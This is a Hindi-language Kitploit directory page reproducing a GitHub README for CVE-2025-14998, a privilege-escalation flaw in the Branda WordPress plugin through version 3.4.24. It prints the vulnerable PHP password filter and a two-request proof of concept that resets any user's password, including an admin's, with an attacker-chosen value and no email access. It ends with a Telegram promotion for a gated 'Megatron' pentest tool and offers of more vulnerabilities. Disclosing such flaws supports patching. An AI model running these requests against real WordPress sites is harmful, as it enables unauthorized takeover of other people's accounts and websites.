Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-14998 — CVE-2025-14998 वर्डप्रेस प्लगइन - Branda – व्हाइट लेबल और ब्रांडिंग, मुफ्त लॉगिन पेज कस्टमाइज़र <= 3.4.24 - बिना प्रमाणीकरण के खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/ktn1990/cve-2025-14998
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 वर्डप्रेस प्लगइन - Branda – व्हाइट लेबल और ब्रांडिंग, मुफ्त लॉगिन पेज कस्टमाइज़र <= 3.4.24 - बिना प्रमाणीकरण के खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
27 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Wordpress Branda – व्हाइट लेबल और ब्रांडिंग, निःशुल्क लॉगिन पेज कस्टमाइज़र <= 3.4.24 - खाता अधिग्रहण के माध्यम से बिना प्रमाणीकरण के विशेषाधिकार वृद्धि

CVE-2025-14998 WordPress के लिए Branda प्लगइन 3.4.24 तक के सभी संस्करणों में खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि के प्रति संवेदनशील है। ऐसा इसलिए है क्योंकि प्लगइन उपयोगकर्ता का पासवर्ड अपडेट करने से पहले उसकी पहचान को ठीक से सत्यापित नहीं करता है। यह बिना प्रमाणीकरण वाले हमलावरों के लिए किसी भी उपयोगकर्ता का पासवर्ड बदलना संभव बनाता है, जिसमें व्यवस्थापक भी शामिल हैं, और इसका उपयोग करके उनके खाते तक पहुँच प्राप्त कर सकते हैं।

अधिक WordPress कमजोरियों और विशेष पेंटेस्ट टूल्स के लिए मुझसे टेलीग्राम पर संपर्क करें @KtN1990।

🔍 मूल कारण विश्लेषण

प्लगइन WordPress की पासवर्ड जनरेशन लॉजिक को random_password फिल्टर में हुक करके ओवरराइड करता है। WordPress को सुरक्षित रैंडम पासवर्ड उत्पन्न करने की अनुमति देने के बजाय, प्लगइन उसे उपयोगकर्ता-नियंत्रित इनपुट से बदल देता है।

संवेदनशील कोड

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 प्रूफ ऑफ कॉन्सेप्ट (सैनिटाइज़्ड)

चरण 1 — मनमाना पासवर्ड के साथ पासवर्ड रीसेट ट्रिगर करें

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

password_1 का मान कोई भी हमलावर-नियंत्रित स्ट्रिंग हो सकता है।


चरण 2 — रीसेट कुंजी के रूप में उसी मान का उपयोग करके रीसेट पूर्ण करें

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ परिणाम

  • WordPress हमलावर-नियंत्रित पासवर्ड स्वीकार करता है
  • व्यवस्थापक का पासवर्ड बदल दिया जाता है
  • हमलावर प्रभावित उपयोगकर्ता के रूप में प्रमाणित हो सकता है

किसी ईमेल एक्सेस या मान्य पासवर्ड रीसेट टोकन की आवश्यकता नहीं है।


💥 प्रभाव

एक बिना प्रमाणीकृत हमलावर निम्न कार्य कर सकता है:

  • किसी भी WordPress उपयोगकर्ता के पासवर्ड रीसेट कर सकता है
  • व्यवस्थापक खातों को अपने कब्जे में ले सकता है
  • WordPress इंस्टॉलेशन का पूर्ण नियंत्रण प्राप्त कर सकता है
  • प्लगइन्स, थीम या सामग्री को संशोधित कर सकता है

संपर्क

  • @KtN1990

अधिक कमजोरियाँ, Megatron देखें!

Logo

  • 💣 Megatron क्या है? Megatron एक उन्नत पैठ परीक्षण उपकरण है जिसे गंभीर परीक्षकों और रेड टीमर्स के लिए डिज़ाइन किया गया है। चाहे आप ऑडिट कर रहे हों, स्कैन कर रहे हों, या इंफ्रास्ट्रक्चर का परीक्षण कर रहे हों, Megatron आपको आवश्यक शक्ति प्रदान करता है।

-🛡️ इसके लिए आदर्श: – सुरक्षा शोधकर्ता – पैठ परीक्षक – नैतिक हैकर

  • 📦 ~230 विरासती शोध मॉड्यूल के साथ अनुरक्षित; स्थिरता और पहचान के लिए हालिया स्कैनर कोर सुधार।

  • 🎯 उद्देश्य: यह विशेष रूप से अधिकृत सुरक्षा परीक्षण, शिक्षा, रक्षात्मक अनुसंधान और रेड-टीम प्रशिक्षण के लिए प्रदान किया जाता है। यह रिलीज़ अवैध उपयोग के लिए नहीं है। वितरण प्रतिबंधित है — सत्यापन और हस्ताक्षरित उत्तरदायी उपयोग समझौते / NDA के बाद ही पहुँच मिलती है।

-🛡️ उत्तरदायी पहुँच नीति (सारांश):

  1. केवल सत्यापित सुरक्षा पेशेवरों, कॉर्पोरेट सुरक्षा टीमों, मान्यता प्राप्त प्रयोगशालाओं या प्रशिक्षण प्रदाताओं तक पहुँच।
  2. आपको संगठन का नाम, भूमिका, आधिकारिक ईमेल (कॉर्पोरेट) और वैध उद्देश्य प्रदान करना होगा।
  3. सत्यापन और हमारे उत्तरदायी उपयोग समझौते / NDA पर हस्ताक्षर करने के बाद ही पूर्ण डाउनलोड दिया जाता है।
  4. दुरुपयोग के प्रति शून्य सहनशीलता — दुर्भावनापूर्ण उपयोग के साक्ष्य के परिणामस्वरूप पहुँच रद्द करना और जहाँ आवश्यक हो रिपोर्ट करना शामिल है।
  • 📩 संपर्क / अनुरोध / सत्यापन: @KtN1990 — संगठन, भूमिका और पहुँच का संक्षिप्त कारण शामिल करें। टेलीग्राम चैनल

डेमो

IMAGE ALT TEXT HERE

लाइसेंस

MIT

टूल डाउनलोड करें